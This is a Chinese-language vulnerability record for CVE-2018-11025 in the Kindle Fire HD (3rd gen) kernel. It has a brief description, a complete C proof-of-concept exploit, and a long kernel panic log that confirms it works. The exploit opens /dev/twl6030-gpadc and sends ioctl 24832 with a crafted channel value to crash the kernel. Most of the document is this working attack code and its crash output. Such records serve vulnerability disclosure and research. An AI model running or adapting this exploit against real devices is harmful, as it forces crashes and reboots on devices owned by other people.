
(CVE-2018-11025) Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞

一、漏洞简介

Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 内核组件中的内核模块 /omap/drivers/mfd/twl6030-gpadc.c 允许攻击者通过设备文件 /dev/twl6030-gpadc 上 ioctl（命令 **24832**）的参数注入特制的参数，并导致内核崩溃。

要触发此漏洞，必须打开设备文件 /dev/twl6030-gpadc，并以命令 **24832** 和精心构造的有效负载作为第三个参数，在该设备文件上调用 ioctl 系统调用。

二、漏洞影响

Fire OS 4.5.5.3

三、复现过程

poc

/*
 * This is a PoC for the Kindle Fire HD (3rd generation).
 * A bug in the ioctl interface of the device file /dev/twl6030-gpadc causes
 * a system crash via IOCTL 24832.
 *
 * This PoC must run with permission to issue ioctl calls on /dev/twl6030-gpadc.
 *
 */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>

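/* Device node exposed by the twl6030 GPADC driver; the PoC needs permission
 * to open it read/write and to issue ioctl calls on it. */
static const char *driver = "/dev/twl6030-gpadc";

/* ioctl request number handed to the driver (decimal 24832 == 0x6100; the
 * crash log shows the same value in r5).  Declared with an explicit type:
 * the original `static command = 24832;` relied on implicit int, which C99
 * removed and current compilers warn about or reject. */
static const int command = 24832;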

/*
 * User-space copy of the argument block passed as the third ioctl argument
 * to /dev/twl6030-gpadc.  The field order and sizes must match the kernel
 * driver's own definition in drivers/mfd/twl6030-gpadc.c — presumably
 * `channel` selects the ADC input and `status`/`result` are filled in by the
 * driver; verify against the driver source.
 */
struct twl6030_gpadc_user_parms {
    int channel;            /* set by the caller; the PoC stores 0x9b2a9212 here */
    int status;             /* NOTE(review): assumed to be written by the driver — confirm */
    unsigned short result;  /* NOTE(review): assumed to be the conversion result — confirm */
};


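/*
 * Write a one-line progress marker to the log file the original PoC wrote
 * with `system("echo N > /data/local/tmp/log")`, without spawning a shell.
 * Best-effort, like the original: a failure to write the marker is ignored.
 */
static void write_marker(const char *marker)
{
        FILE *log = fopen("/data/local/tmp/log", "w");
        if (log == NULL) {
                return;
        }
        fprintf(log, "%s\n", marker);
        fclose(log);
}

/*
 * Entry point: open the gpadc device node, issue ioctl `command` with the
 * crafted user_parms block, and report the outcome.
 *
 * Returns 0 if the ioctl returns without error and -1 if the device cannot be
 * opened or the ioctl is rejected.  On an affected kernel the call does not
 * return at all: the crash log shows the fault inside twl6030_gpadc_ioctl,
 * presumably because the driver uses the caller-supplied channel value
 * without range-checking it (confirm against the driver source).
 *
 * The marker written to /data/local/tmp/log lets a harness distinguish
 * "device not opened" (1) from "ioctl rejected" (2) from a reboot (no marker).
 * argc/argv/env are unused.
 */
int main(int argc, char **argv, char **env) {
        (void)argc;
        (void)argv;
        (void)env;

        /* Designated initialiser: only channel carries the crafted value,
         * status and result are explicitly zero as in the original PoC. */
        struct twl6030_gpadc_user_parms payload = {
            .channel = (int)0x9b2a9212,
            .status = 0,
            .result = 0,
        };

        int fd = open(driver, O_RDWR);
        if (fd < 0) {
            printf("Failed to open %s, with errno %d\n", driver, errno);
            write_marker("1");
            return -1;
        }

        /* The original message said "payload NULL", but a pointer to the
         * user_parms block is what is actually passed. */
        printf("Try ioctl device file '%s', with command 0x%x and a crafted user_parms payload\n", driver, command);
        printf("System will crash and reboot.\n");
        if (ioctl(fd, command, &payload) < 0) {
            /* errno is read before printf runs, so it is still the ioctl's. */
            printf("ioctl on %s failed, errno %d\n", driver, errno);
            write_marker("2");
            close(fd);  /* the original leaked fd on this path */
            return -1;
        }
        close(fd);
        return 0;
}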

崩溃日志

[18460.321624] Unable to handle kernel paging request at virtual address 4b3f25fc
[18460.330139] pgd = ca210000
[18460.333251] [4b3f25fc] *pgd=00000000
[18460.337768] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[18460.343810] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[18460.351440] CPU: 0    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[18460.358825] PC is at twl6030_gpadc_ioctl+0x160/0x180
[18460.364379] LR is at twl6030_gpadc_conversion+0x5c/0x484
[18460.370452] pc : [<c031b080>]    lr : [<c031a950>]    psr: 60030013
[18460.370452] sp : de94dd90  ip : 00000000  fp : de94df04
[18460.383422] r10: 00000000  r9 : dcccf608  r8 : bea875ec
[18460.389282] r7 : de94c000  r6 : 00000000  r5 : 00006100  r4 : bea875ec
[18460.396697] r3 : fffffeb4  r2 : 4b3f2730  r1 : de94dee8  r0 : 00000001
[18460.404113] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[18460.412048] Control: 10c5387d  Table: 8a21004a  DAC: 00000015
[18460.418609] 
[18460.418609] PC: 0xc031b000:
[18460.423583] b000  e24b101c e30f3eb4 e34f3fff e0822082 e0812102 e51220e4 e18120b3 e5973008
[18460.434234] b020  e294200c 30d22003 33a03000 e3530000 0a000006 e3e0000c e24bd01c e89da8f0
[18460.444885] b040  e24b0e17 e3a0100c ebfcf5c4 eafffff8 e1a00004 e24b1e17 e3a0200c ebfced7f
[18460.455444] b060  e3500000 0afffff3 eafffff1 e51b2170 e24b101c e30f3eb4 e34f3fff e0812102
[18460.465972] b080  e5122134 e18120b3 eaffffe3 03e0303c 150b016c 050b316c eaffffdf c0acabbc
[18460.476623] b0a0  e1a0c00d e92dd800 e24cb004 e59030e0 e3530000 159000ec 03e00012 e89da800
[18460.487182] b0c0  e1a0c00d e92dd800 e24cb004 e59000f0 e89da800 e1a0c00d e92dd800 e24cb004
[18460.497863] b0e0  e5d020e9 e5d030e8 e1820003 e2000003 e89da800 e1a0c00d e92dd800 e24cb004
[18460.508544] 
[18460.508544] LR: 0xc031a8d0:
[18460.513519] a8d0  e89da878 e1a00004 ebffff20 e2000003 e3500002 13e0000a 03a00000 e89da878
[18460.524078] a8f0  c09ba0c0 e1a0c00d e92ddff0 e24cb004 e24dd014 e2509000 0a000114 e59f5454
[18460.534759] a910  e595008c e3500000 0a00010b e2800004 eb0e1ff0 e1d910b6 e3510001 9a00000a
[18460.545318] a930  e595308c e3e06015 e59f142c e5930000 ebff4e6b e595a08c e28a0004 eb0e1f69
[18460.555999] a950  e1a00006 e24bd028 e89daff0 e595a08c e3a03f52 e023a193 e5933038 e3530000
[18460.566680] a970  13e0600f 1afffff3 e59a32c4 e0818101 e595c088 e3130010 e08c7008 1a000025
[18460.577331] a990  e3510000 0a0000c4 e1d930b8 e3530001 0a0000d7 e1d940b6 e3540000 0a0000bc
[18460.587890] a9b0  e3a0000e e3a01002 e3a02090 e5956088 ebfff8bc e3540001 0a0000d1 e1d920b6
[18460.598571] 
[18460.598571] SP: 0xde94dd10:
[18460.603546] dd10  00000000 0000000d de94dda0 10624dd3 de94dd4c c031b080 60030013 ffffffff
[18460.614196] dd30  de94dd7c bea875ec de94df04 de94dd48 c06a5318 c0008370 00000001 de94dee8
[18460.624877] dd50  4b3f2730 fffffeb4 bea875ec 00006100 00000000 de94c000 bea875ec dcccf608
[18460.635528] dd70  00000000 de94df04 00000000 de94dd90 c031a950 c031b080 60030013 ffffffff
[18460.646087] dd90  de94ddac 9b2a9212 00000000 00000000 00040000 0001f8fc 00000000 00000000
[18460.656738] ddb0  c00795a0 00000001 de94ddd4 de94ddc8 c00795b4 c00792bc de94de0c de94ddd8
[18460.667419] ddd0  c0070df8 c00795ac de94c000 00000001 00000004 dd32f8f4 60000013 00000001
[18460.678100] ddf0  00000001 00000004 dd32f800 00000000 00000000 de94de10 c00723a0 c06a4818
[18460.688629] 
[18460.688659] FP: 0xde94de84:
[18460.693725] de84  de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0
[18460.704284] dea4  000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000
[18460.714935] dec4  00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000
[18460.725616] dee4  00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044
[18460.736328] df04  c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8
[18460.746856] df24  de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000
[18460.757537] df44  00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000
[18460.768096] df64  00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000 00000400
[18460.778625] 
[18460.778625] R1: 0xde94de68:
[18460.783721] de68  c2572140 de94debc 00000001 00000028 000fffff 00000001 de94dedc de94de90
[18460.794403] de88  c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0 000fffff
[18460.804962] dea8  00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000 00000001
[18460.815643] dec8  dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000 00000000
[18460.826202] dee8  00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044 c031af2c
[18460.836730] df08  00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8 de94df0c
[18460.847381] df28  de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000 00000000
[18460.858032] df48  de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000 00000000
[18460.868713] 
[18460.868713] R3: 0xfffffe34:
[18460.873687] fe34  ******** ******** ******** ******** ******** ******** ******** ********
[18460.884246] fe54  ******** ******** ******** ******** ******** ******** ******** ********
[18460.894805] fe74  ******** ******** ******** ******** ******** ******** ******** ********
[18460.905456] fe94  ******** ******** ******** ******** ******** ******** ******** ********
[18460.916137] feb4  ******** ******** ******** ******** ******** ******** ******** ********
[18460.926788] fed4  ******** ******** ******** ******** ******** ******** ******** ********
[18460.937347] fef4  ******** ******** ******** ******** ******** ******** ******** ********
[18460.948028] ff14  ******** ******** ******** ******** ******** ******** ******** ********
[18460.958709] 
[18460.958709] R7: 0xde94bf80:
[18460.963684] bf80  de926680 c00635cc 00000013 de84190c de926680 c00635cc 00000013 00000000
[18460.974365] bfa0  00000000 00000000 de94bff4 de94bfb8 c0068af4 c00635d8 00000000 00000000
[18460.985015] bfc0  de926680 00000000 00000000 00000000 de94bfd0 de94bfd0 00000000 de84190c
[18460.995574] bfe0  c0068a64 c004cd64 00000000 de94bff8 c004cd64 c0068a70 1d04e2fb 1dfbe204
[18461.006225] c000  00000000 00000002 00000000 c2572140 c0a0e840 00000000 00000015 cf9fca80
[18461.016906] c020  00000000 de94c000 c09ddc50 c2572140 c25717c0 c1617b40 de94da7c de94d9c8
[18461.027587] c040  c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[18461.038146] c060  00c5f4c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000
[18461.048828] 
[18461.048828] R9: 0xdcccf588:
[18461.053802] f588  dcccf588 dcccf588 00000000 00000000 00000000 c06bc674 000200da c09dda58
[18461.064483] f5a8  00000000 00000000 dcccf5b0 dcccf5b0 00000000 dcccf5bc dcccf5bc 00000000
[18461.075134] f5c8  5ae3ed25 00000000 00000000 00000000 dcccf5e0 00000000 00000000 00000000
[18461.085815] f5e8  00200000 00000000 00000000 dcccf5f4 dcccf5f4 dccb2440 dccb2440 00000000
[18461.096343] f608  00052180 00000000 00000000 00000000 00000000 00000000 c06b9600 dd1a4800
[18461.107025] f628  dcccf6e0 dccb0300 00000c45 00000001 00a0003b 5ae3ed25 2bc5ac58 5ae3ed25
[18461.117675] f648  2bc5ac58 5ae3ed25 2bc5ac58 00000000 00000000 00000000 00000000 00000000
[18461.128234] f668  00000000 00000000 00000000 00000000 00000001 00000000 00000000 dcccf684
[18461.138885] Process twl6030_gpadc_i (pid: 12849, stack limit = 0xde94c2f8)
[18461.146697] Stack: (0xde94dd90 to 0xde94e000)
[18461.151611] dd80:                                     de94ddac 9b2a9212 00000000 00000000
[18461.160827] dda0: 00040000 0001f8fc 00000000 00000000 c00795a0 00000001 de94ddd4 de94ddc8
[18461.170043] ddc0: c00795b4 c00792bc de94de0c de94ddd8 c0070df8 c00795ac de94c000 00000001
[18461.179138] dde0: 00000004 dd32f8f4 60000013 00000001 00000001 00000004 dd32f800 00000000
[18461.188354] de00: 00000000 de94de10 c00723a0 c06a4818 00000004 00000001 dd32e0d8 dd32f800
[18461.197570] de20: dd32e000 0000000a de94c000 c26fda80 de94de54 de94de40 c02ba53c c0072360
[18461.206787] de40: dd32f800 dd32e000 de94de74 de94de58 c02c3c88 c02ba518 dd32e000 00000002
[18461.215881] de60: 00000002 dd32fbbc c2572140 de94debc 00000001 00000028 000fffff 00000001
[18461.225097] de80: de94dedc de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8
[18461.234313] dea0: c00723a0 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14
[18461.243408] dec0: 00000000 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000
[18461.252624] dee0: 00000000 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08
[18461.261840] df00: c0136044 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490
[18461.271057] df20: d8f925d8 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004
[18461.280151] df40: de94c000 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004
[18461.289367] df60: de94c000 00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000
[18461.298583] df80: 00000400 bea87618 00010e5c 00000000 00000036 c0013e08 00000000 de94dfa8
[18461.307800] dfa0: c0013c60 c0136578 bea87618 00010e5c 00000004 00006100 bea875ec bea875ec
[18461.316894] dfc0: bea87618 00010e5c 00000000 00000036 00000000 00000000 00000000 bea87604
[18461.326110] dfe0: 00000000 bea875d4 00010698 0002918c 60000010 00000004 00000000 00000000
[18461.335296] Backtrace: 
[18461.338317] [<c031af20>] (twl6030_gpadc_ioctl+0x0/0x180) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[18461.348571]  r7:d683fb40 r6:00000004 r5:d683fb40 r4:00000000
[18461.355560] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[18461.364807] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[18461.374206]  r8:c0013e08 r7:00000036 r6:00000000 r5:00010e5c r4:bea87618
[18461.382507] Code: e24b101c e30f3eb4 e34f3fff e0812102 (e5122134) 
[18461.401061] Board Information: 
[18461.401061]  Revision : 0001
[18461.401092]  Serial    : 0000000000000000
[18461.401092] SoC Information:
[18461.401092]  CPU    : OMAP4470
[18461.401122]  Rev    : ES1.0
[18461.401122]  Type    : HS
[18461.401122]  Production ID: 0002B975-000000CC
[18461.401122]  Die ID    : 1CC60000-50002FFF-0B00935D-11007004
[18461.401153] 
[18461.406127] audit_printk_skb: 111 callbacks suppressed
[18461.406127] type=1400 audit(1525657115.783:1097): avc:  denied  { getattr } for  pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406280] type=1400 audit(1525657115.783:1098): avc:  denied  { execute } for  pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406524] type=1400 audit(1525657115.783:1099): avc:  denied  { read open } for  pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406768] type=1400 audit(1525657115.783:1100): avc:  denied  { execute_no_trans } for  pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.534057] ---[ end trace f98f4a7b98572f61 ]---
[18461.540374] Kernel panic - not syncing: Fatal exception
[18461.546173] CPU1: stopping
[18461.549285] Backtrace: 
[18461.552459] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[18461.561828]  r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[18461.568969] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[18461.578185] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[18461.587554] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5540>] (__irq_usr+0x40/0x60)
[18461.596862] Exception stack(0xc8967fb0 to 0xc8967ff8)
[18461.602691] 7fa0:                                     404143ed 4041294b 00000054 000012f0
[18461.611755] 7fc0: 4028cdb4 4040e438 0000012f 4041294b 4040d148 404111d8 beb9c2e0 404275c0
[18461.620971] 7fe0: 40416bef beb9c1f0 4009d01f 400a0ec0 000f0010 ffffffff
[18461.628478]  r6:ffffffff r5:000f0010 r4:400a0ec0 r3:404143ed
[18461.635559] CPU0 PC (0) : 0xc003ee38
[18461.639617] CPU0 PC (1) : 0xc003ee54
[18461.643798] CPU0 PC (2) : 0xc003ee54
[18461.647857] CPU0 PC (3) : 0xc003ee54
[18461.651916] CPU0 PC (4) : 0xc003ee54
[18461.656097] CPU0 PC (5) : 0xc003ee54
[18461.660156] CPU0 PC (6) : 0xc003ee54
[18461.664215] CPU0 PC (7) : 0xc003ee54
[18461.668395] CPU0 PC (8) : 0xc003ee54
[18461.672454] CPU0 PC (9) : 0xc003ee54
[18461.676513] CPU1 PC (0) : 0xc0019b2c
[18461.680694] CPU1 PC (1) : 0xc0019b2c
[18461.684753] CPU1 PC (2) : 0xc0019b2c
[18461.688812] CPU1 PC (3) : 0xc0019b2c
[18461.692871] CPU1 PC (4) : 0xc0019b2c
[18461.697051] CPU1 PC (5) : 0xc0019b2c
[18461.701110] CPU1 PC (6) : 0xc0019b2c
[18461.705169] CPU1 PC (7) : 0xc0019b2c
[18461.709381] CPU1 PC (8) : 0xc0019b2c
[18461.713409] CPU1 PC (9) : 0xc0019b2c
[18461.717498] 
[18461.719268] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[18461.719299]